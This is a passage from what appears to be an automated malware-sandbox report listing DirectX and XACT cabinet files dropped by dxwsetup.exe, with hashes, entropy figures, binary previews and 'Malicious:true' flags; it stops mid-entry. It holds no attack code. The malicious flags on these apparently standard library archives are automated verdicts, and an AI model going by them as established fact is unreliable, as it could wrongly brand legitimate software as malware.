                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Mar2009_d3dx9_41_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\OCT2006_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):141225
                                                                                              Entropy (8bit):7.994197909856769
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
                                                                                              MD5:4FD2B859952C008DE0542053B15BF0D1
                                                                                              SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
                                                                                              SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
                                                                                              SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........<5p. .xact2_4_x86.cat..;..! ....<5n. .x3daudio1_1.dll.....9[....<5.. .xactengine2_4.dll.W...Q.....<5.. .oct2006_xact_x86.inf...........<5.. .xact2_4_x86.inf....)l:..CK.|.\.........." .DE...N..!.*.....A.\....."*.x>...Q\<V.X.k.Q.W].u3bDWWQP.Bt.|.......~.....?'.twuUuuuUu..-^..=d~...z....".>.t...W...b..Q...^D...=T.B....PJ..5.:...t4@..Bg..j.{zR..]-O.'.....]pwG7G.......wA.".....bI.s.../..?g..nw....t.F..#.\......9...A........N...x...q.......R..p|<n.......$.!.T,....0.&.{...V]4@7.w...r..<..@[.w.z."..S?..J.F.a.c.. ...F. q.1{..Ov..`\..I./.B.../.N ./....~s.T*h.2....`...(.)B@}.!.........?.Z...r.9.;...n....D|_.p.,4.. ...........$|....b...Q.....r4.&N..w.,.O......$z.....F... ......A.....H2$#N......D.u%...%?...>._...DY.m..O.k.7Y....1..".......,h.......,l,..;.JgS0.....p.n....%......H.k.Hv.46.t.?.R8....x....F..Lq.... ..:...y......K..k..[..;...^[!.....F.P...}V5...}_7...q..z.b#...PFFEZ$].:.k......-

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Apr2007_d3dx9_33_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1601398 bytes, 6 files, at 0x44 +A "d3dx9_33_x64.cat" +A "d3dx9_33.dll", flags 0x4, ID 8295, number 1, extra bytes 20 in head, 140 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1610566
                                                                                              Entropy (8bit):7.999804070832858
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:NjzSeifTXjfzuO/m35sCqSrSBEZqyi2bjbBfQbIKpP5FfiB0Qjq/X1ZXp8e:NvSeSTXj7u0OUM9UStQbNd/Gjq/FD
                                                                                              MD5:F33C12F535DC4121E07938629BC6F5B2
                                                                                              SHA1:6B93FBE3D419670A71813E087D289B77E58E482B
                                                                                              SHA-256:3CA2ACF6B952D6438B91E540F39ABCB93EE12E340BA1302F7406F01568E5CF91
                                                                                              SHA-512:DF1753AB43D5B7FDE2A5EB65A77B37BA28599BC0683A4306F101C75F82B0F1A2C8DDF5741981073CC5DF26E9EA38C9A495ED0FB1689D2E7FC7D6F693759C822A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....vo......D...............g ..........vo...#...................(.........6{. .d3dx9_33_x64.cat.h.D..(....l6O. .d3dx9_33.dll.h.....D....6.. .infinst.exe.,...h.E....6C. .apr2007_d3dx9_33_x64.inf.......E....6B. .d3dx9_33_x64.inf...../.E....6B. .d3dx9_33_x64_xp.inf...'+....[...S g.uM....5!.f...O..v.f.......t.nn$$....d.].Up.$..*...Z2]T.B.FB-.5..I.c3CF3..g....^....=.7....ZF..J.j.c..q..R.....K.6VW..j.9j.+.....J.N.t|6....K..(......-4Fpq...of..@na......A...X.jg..5D...~...........T.....ymsv..f..'"m..k..?..d..=/M..\..3..!.%)....)....v.7l.%.$$.(!RR..@.e.. ........ EfP.h.H......^Q^C.c.u.....u..6......PD...I.\$.J=BX.7..d..H|...h.5zen.Y...KsJ.wk..m.{...KRJ.JJ0t..u/$.N..:..y<...).......)Tjg..GL.=.7.4wGV..|.B.4`.{.})?.#..O..0|.J.NN.9......|u.N_Xi2....$.'..,.......}.j'..... ......I..M...h...&W.$. ..9rs.;.])*...SER.SMDhBS..D.gTFD..0M...E.....D.o..:}du[....b..Y#..`...9.<.'G.:..Q...y'._..|....\1O.o).$..(.')$..`.'oB...jF.%...w....cQ....`.o...k<..[...T....o%

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2005_d3dx9_27_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1344582 bytes, 5 files, at 0x44 +A "d3dx9_27_x64.cat" +A "d3dx9_27.dll", flags 0x4, ID 6663, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1353750
                                                                                              Entropy (8bit):7.999671999388792
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:eG/1unuf7Ga2dGKSnUG+zOADaZmd+JzQpymAFVZcRVhZ9k7LN7QDKW+L:eg4G7GaISn+6FZC+5vmC7EUNRWU
                                                                                              MD5:A9F4068650DF203CEE34E2CA39038618
                                                                                              SHA1:CD8CAECEECD01DAC35B198B42725CBEB5B7965A7
                                                                                              SHA-256:3500C1A7CFB5594521338D1C29946D1E4FFA44D5B6BC6CF347C5BBBDE18E94DC
                                                                                              SHA-512:C92FB461B53051A22FB480BA5B6BF2706614AE93BE055B00280BE4DACE19C1F2A9327106A71851B0E42F39E4172EA3A027F7CE878BCBCB252B723EEA49DBCF1B
                                                                                              Malicious:true
                                                                                              Preview:MSCF....F.......D...........................F....#..............w...<..........2.. .d3dx9_27_x64.cat...:.<......2d. .d3dx9_27.dll......7:....29. .infinst.exe.&....-;....2.. .aug2005_d3dx9_27_x64.inf......1;....2.. .d3dx9_27_x64.inf....p.9..[.... x.m......R.P...?-.."..."-..%V"J..J ...E.VPU..*.2jC..UJ...^P.a..T.A..,...;.......YI...K.....!.N...s..f.m...Q.........<X...J]G2.... ..A..l.m........ .......@....2sx2.HH.....@dC...pWCy/....!..k.GVc.).1q.P.=...b.ua.%ER.q...t.>q.?RVa..$..j.|..'..RZ.Y..zn.c......q./.2G2w...|p4Q.Q.F...X./..~......F[$..!.#..Q....$*.P|....tE..../...3....a.....y...'...[6..^@.k...+.y.:..h_h.8..C...I................3.<..*.#....0.x.....?;!.g.......t.p.o...2!.x..M....~.g..~..hH...KIx.g...-....IX.Ru..P....J..{|,.3.#.wz........K...W.Y.....}..d.l...\..P.z...[HoP.....X...f.5.=b....hy......Jw...q.N'r.B........\.x..J..c..`=&.L!...R.......y..]x......~......s..}..'..S|n....%3.=........Z..T..._./(5\[v..r....~.....I.!..cjv).M...x....(&.(../.:q..1.......

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Aug2009_d3dx10_42_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\DEC2006_d3dx9_32_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1568416 bytes, 4 files, at 0x44 +A "d3dx9_32_x86.cat" +A "d3dx9_32.dll", flags 0x4, ID 5512, number 1, extra bytes 20 in head, 105 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1577608
                                                                                              Entropy (8bit):7.999092247669469
                                                                                              Encrypted:true
                                                                                              SSDEEP:49152:VKo9fY3tlVm3JjPueurZ8zQbC88LHhpu97Sm:V13BFurZ8U18uSm
                                                                                              MD5:A5BEAD938AFDC63ADFECC1DAF5049D7F
                                                                                              SHA1:B3D5BF56F6B9BF87C33009A088BA7785B6363B4E
                                                                                              SHA-256:A1CC7603302EE53D54F4353C223D95E223706924D99B864220B13814EF93EEFB
                                                                                              SHA-512:C9244BBCFE60F347EC8785B1A41B6E243153624EA73B16DB4D624239A69FA76D2DF2E54039D8F4D2C495890AC17B676E390F796118B4E16D9F03683247190362
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............i..............5.a .d3dx9_32_x86.cat..G4.......}5.h .d3dx9_32.dll......f4....5.` .d3dx9_32_x86.inf.M....i4....5.` .dec2006_d3dx9_32_x86.inf.4.$G.@..CK..\.K..?.........7...a....4.... @..LB. `..b..;......{/.;.g7A......}......uv.3.....9X....:.G...`.eT..p...X,..V..C]c.....3^aV......n.*.3..N.0K3s..%.eb...e../...7..$.~.e#+...<....=..U...R...<..I8..H.D..L.. 1.!........np..\...a...D.'....@(:./.A..{...H.e...b...4Y.c.<..P...H..............].;gl.$q.........}..%,.g.....X.C...*HAUZQ1..C.PM.v.\q...T.0Y.3.a.#.\!...O........A)...K....\....PF.X..te...P...B....).).V.(]Jt...A}.S.t|1S#z....\}./.....\..............(..0....'}..N.]......y,..~.R....f.P.E.T....d#.k.b..`P.../..0W.K&....!.!........M......EL&..bBA.b....q.H.Q.5..5..u....{.ka.k.s.PA^.e.5....c#......d...2..).V.e....2.^.;.....L.....s.`.iK...Q..N.Q.%.T......k..M...U...d...H.W..f.I......kF;X..;.%..N.....j.....6......L.T.).JU"["..`....1..........D.QO,..

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2005_d3dx9_28_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_d3dx10_00_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............U................#.............................5.a .d3dx10_00_x86.cat...........}5.h .d3dx10.dll............5.` .d3dx10_00_x86.inf............5.` .dec2006_d3dx10_00_x86.inf....9.>..CK..\.K...C..DEA.P.$.......$...%.A.....0 F.Y.s.1#...#..f.......y...}....ZU..jU......SP.=.gB..GQ....>.5.p8.*<%.y3uY.....Xv.....G.S..)/...A.x....@U.GN.....{,.0nI..@.......d.......R..S....s..B.........B...H. ;.. 9..<...nL.5..!..4=.>.o....A..u.i^...dd..x!.....p...@Jn.;H.L...d......&$. ..|<&/;.O...!.A..%##C.RZ...YG....Z.h..ee........+..D...D&.F.....?.a...Io..hg.5..blP..I.......B....`..,.....u..=A...<.%!.8.,.0....b...v.O..a....#.._J....3o.........F..Z {".t\..H..eo..1h.m.0.a....1....Bc..s.^..V..Bq.x...D(.E....@...&......<._..xv......OB....6L......y.. ....$3.....AB.&.cC8C".p.9.,[..mZ...C+....J.....A.04...rY.....7.y..!^....>j.+yj-#.#...h23.e..)....f....k.:@.-..3...,...O..Vl..#....MIK.Yk@j...^!,96O".....T...\.H,IIL....dfXw.u..e.w.F...C...Y).I\....&.[.4.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Dec2006_xact_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 139639 bytes, 5 files, at 0x44 +A "xact2_5_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7324, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):148831
                                                                                              Entropy (8bit):7.993942345904899
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kF/u2w4VarOr9vE3eKgpEUcXDlkCAMsukGtnJW+ATOcfKy:kF/JWg9vE3eKzXDeMpNnUOcfKy
                                                                                              MD5:082B7D69F96799AA2AB1A8EA1FA2AB88
                                                                                              SHA1:75C7032B749259977C947A5103F9A4B92C2025DE
                                                                                              SHA-256:B98E55C654B9EE6F6D040665D932BEA7A1299C56CC9996EEA900AC4F5649C7D3
                                                                                              SHA-512:57C96A4C99AB9A7D33A8CC81A3B4E2AB58FE3A2FBC7F79AD688C7D0257D281C662D4CE0737F68C00D15F715BC6177D2FF9CC32A69CFB77216265FA56FF79DD8A
                                                                                              Malicious:true
                                                                                              Preview:MSCF....w!......D...........................w!...#..................! .........5.a .xact2_5_x86.cat..;..! ....o5.\ .x3daudio1_1.dll.....9[.....5@` .xactengine2_5.dll.W...Q2.....5.` .dec2006_xact_x86.inf......8.....5.` .xact2_5_x86.inf.@.u..;..CK.|.\S.........EY...E.......A..M..dk.P\.DT..V..Rq..R.*.(..V.[m........E....}...}.......{g..9g.9....x!.ZGo....o.)..B...........a8.....^H....C.S.].)e....U.,.}..E...a7..+.......xv.>..H......N.Sp#-t*.J...)...c0'....1w... ..9c8..8.~NP........O7(.b....%.u...T..-.....9*.;........H...~c 7.n>.A9.........W....#..@..p!.G.R1\....B.N.'..Z.c|0..(+.l...<._(6..cYX:&.$p.F?.VK.t.....[|,....q.b.....AS6...h.I.G....1 ...z.....J.j.~..-.H...@.z>.. M...{.".........o7...-....E..C..6..................`...... m)..ad.#.5...p.....j..j|..w...#.j]..BZ.......?oK...=_L.bDD..{.VK^...qe.../x.5.,h....1.".l,.x...N..)..N.A............%.H.k.Dv.4Kd......,..f...lB.QO6.N.(`..D..<W+......j....d....{o..t...e4*.Je.=.w.....773....q...Ha@.*..Q..I.1.N....4

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2005_d3dx9_24_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1007265 bytes, 4 files, at 0x44 +A "d3dx9_24_x86.cat" +A "d3dx9_24.dll", flags 0x4, ID 4987, number 1, extra bytes 20 in head, 69 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1016433
                                                                                              Entropy (8bit):7.998972724711677
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:T/HUK+hlSM4jwe8WpmQUrxiUyULWoF/V++TYrjVdLa1:bHURewe8W4VN8uF/VhMr5s1
                                                                                              MD5:7029866BA46EC477449510BEEE74F473
                                                                                              SHA1:D2F2C21EAB1C277C930A0D2839903ECC55A9B3E8
                                                                                              SHA-256:3D4E48874BDDCD739CF79BF2B3FD195D7C3E861F738DC2EAB19F347545F83068
                                                                                              SHA-512:B8D709775C8D7CA246D0E52FF33017EE9A718B6C97C008181CD0C43DB7E60023D30D2F99A4930EBA124AF2F80452CBF27836D5B87E2968FB0F594ECA1EBF78DD
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....^......D...............{............^...#..............E...7.........E2.. .d3dx9_24_x86.cat...!.7.....E2.. .d3dx9_24.dll......."...92.. .d3dx9_24_w9x.inf......."...92.. .d3dx9_24_x86.inf.(~m.?..CK..\.Y..O..........H.$@..(M..X.. R.I...6...#.^.......{w..}&............{.3..gf.e.....0*`..kFm.......i.`p....X..Y-..7]n^..9...e.(.7..^..V.FO+...v.,e.^..l(i~w...M...l...s...z..U.7.c5.b.3..........#1.I.'.F2.C.@.......'Hx /..K.~.`g.).0..".8y....0.8...N.|..v.u@...P...H.R......c;W....yg..x....s...2..\...}..%21.D..... ...q.....E,.....q.Ee..$...66...pGr}.. +..!&&&PK..f.r...x.'..<.. ....kH..@....~l....\....@fD...+y..:UC.%...zy1.........~j..v..{%..v[S.ZEE...5....i;..1.(...&.x._.......R+[A..l..z(.e. .k..jbf.@.336T.[...'...J/-..uHc.u.....6..U.....).l...&.".9.X..H\.N...d.V.g...^...Jv..PQ~#?....V.......j:..p.....k.R.......0o.~..F..70.).4b7......+.:.&.)Qd(9...i....J35q.....T%..b._....,..........)Qjt.DU.B.R.s..-.`.......4HE...JObJDlG.4x......lb..<..C..sHD.

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\Feb2006_XACT_x64[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...

                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\JUN2006_XACT_x86[1].cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
